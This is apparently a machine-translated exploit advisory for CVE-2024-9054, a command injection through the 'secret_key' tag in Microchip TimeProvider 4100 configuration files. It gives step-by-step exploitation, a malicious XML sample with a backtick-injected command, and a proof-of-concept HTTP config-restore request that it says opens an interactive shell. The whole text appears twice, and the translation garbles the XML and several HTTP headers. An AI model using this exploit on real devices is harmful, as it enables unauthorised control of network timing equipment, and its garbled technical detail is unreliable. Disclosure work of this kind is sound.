#利用标题: Microchip TimeProvider 4100 Grandmaster配置文件- 远程代码执行(RCE)
#利用作者: Armando Huesca Prida
#发现了By: Armando Huesca Prida,Marco Negro,Antonio Carriero,Vito Pistillo,Davide Renna,Manuel Leone,Massimiliano Brolli
#披露日期: 27/06/2024
#CVE出版物的日期: 4/10/2024
#开发出版物: 10/10/2024
#供应商HomePage3360 https://www.microchip.com/
#版本:固件版本1.0至2.4.7
#测试ON:固件版本2.3.12
#CVE: CVE-2024-9054
#外部参考文献:
#url: https://www.cve.org/cvecord?id=cve-2024-9054
#url: https://0xhuesca.com/2024/10/cve-2024-9054.html
#url: https://www.microchip.com/en-us/sol...y-vulneribilities/timeprovider-provider-4100-
#url: https://www.gruppotim.it/it/footer/red-team.html
#漏洞描述:
Microchip TimeProvider 4100设备的配置文件中的“ Secret_Key” XML标签中存在远程代码执行(RCE)漏洞。一旦装有恶意有效负载的配置文件将由设备加载,在第一次尝试登录后,有效负载将执行,从而导致远程代码执行。
#开发步骤:
1-执行登录设备的管理Web界面。
2-下载设备的配置文件。
3-用恶意有效载荷代替“ secret_key”值。
4-保存包含要执行的OS命令的新配置文件。
5-还原并提交新配置。
6-尝试使用SSH/Telnet/Console等任何活动服务登录将触发恶意有效载荷。
#恶意XML配置文件:的示例
?XML版本='1.0'?
[.]
安全
[.]
服务器
IP192.168.1.1/ip
secret_keying 192.168.1.20`/secret_key
[.]
/服务器
[.]
/安全
[.]
#概念证明-POC:
手动修改以下请求,可以在脆弱设备上获得交互式外壳。以下提供了要在漏洞-HTTP请求:上更新的值列表
post /config_restore http /1.1
HOST: [设备IP]
cookie: ci_session=[session cookie]
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT: /
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:多部分/form-data;边界=----------------------------------- 18270890932264258269120487002
内容长度: 206640
Origin: https://[设备IP]
Referer: https://[设备IP]/configbackuprestore
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
TE:拖车
Connection:保持空白
------------------------------------------------------- 18270890932264258269120487002
content-disposition: form-data;名称='文件';文件名='tp4100_cfg.txt'
content-type:文本/平原
[XML配置文件包含“ secret_key”标签上的注入]
------------------------------------------------------- 18270890932264258269120487002
content-disposition: form-data;名称='pword'
[清除文本中的Web帐户密码]
-------------------------------------------------------- 18270890932642582691204887002-
# 结尾
#利用作者: Armando Huesca Prida
#发现了By: Armando Huesca Prida,Marco Negro,Antonio Carriero,Vito Pistillo,Davide Renna,Manuel Leone,Massimiliano Brolli
#披露日期: 27/06/2024
#CVE出版物的日期: 4/10/2024
#开发出版物: 10/10/2024
#供应商HomePage3360 https://www.microchip.com/
#版本:固件版本1.0至2.4.7
#测试ON:固件版本2.3.12
#CVE: CVE-2024-9054
#外部参考文献:
#url: https://www.cve.org/cvecord?id=cve-2024-9054
#url: https://0xhuesca.com/2024/10/cve-2024-9054.html
#url: https://www.microchip.com/en-us/sol...y-vulneribilities/timeprovider-provider-4100-
#url: https://www.gruppotim.it/it/footer/red-team.html
#漏洞描述:
Microchip TimeProvider 4100设备的配置文件中的“ Secret_Key” XML标签中存在远程代码执行(RCE)漏洞。一旦装有恶意有效负载的配置文件将由设备加载,在第一次尝试登录后,有效负载将执行,从而导致远程代码执行。
#开发步骤:
1-执行登录设备的管理Web界面。
2-下载设备的配置文件。
3-用恶意有效载荷代替“ secret_key”值。
4-保存包含要执行的OS命令的新配置文件。
5-还原并提交新配置。
6-尝试使用SSH/Telnet/Console等任何活动服务登录将触发恶意有效载荷。
#恶意XML配置文件:的示例
?XML版本='1.0'?
[.]
安全
[.]
服务器
IP192.168.1.1/ip
secret_keying 192.168.1.20`/secret_key
[.]
/服务器
[.]
/安全
[.]
#概念证明-POC:
手动修改以下请求,可以在脆弱设备上获得交互式外壳。以下提供了要在漏洞-HTTP请求:上更新的值列表
- [会话cookie]
- [XML配置文件包含“ Secret_Key”标签上的注入]
- [清除文本中的Web帐户密码]
- [设备IP]
post /config_restore http /1.1
HOST: [设备IP]
cookie: ci_session=[session cookie]
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT: /
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:多部分/form-data;边界=----------------------------------- 18270890932264258269120487002
内容长度: 206640
Origin: https://[设备IP]
Referer: https://[设备IP]/configbackuprestore
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
TE:拖车
Connection:保持空白
------------------------------------------------------- 18270890932264258269120487002
content-disposition: form-data;名称='文件';文件名='tp4100_cfg.txt'
content-type:文本/平原
[XML配置文件包含“ secret_key”标签上的注入]
------------------------------------------------------- 18270890932264258269120487002
content-disposition: form-data;名称='pword'
[清除文本中的Web帐户密码]
-------------------------------------------------------- 18270890932642582691204887002-
# 结尾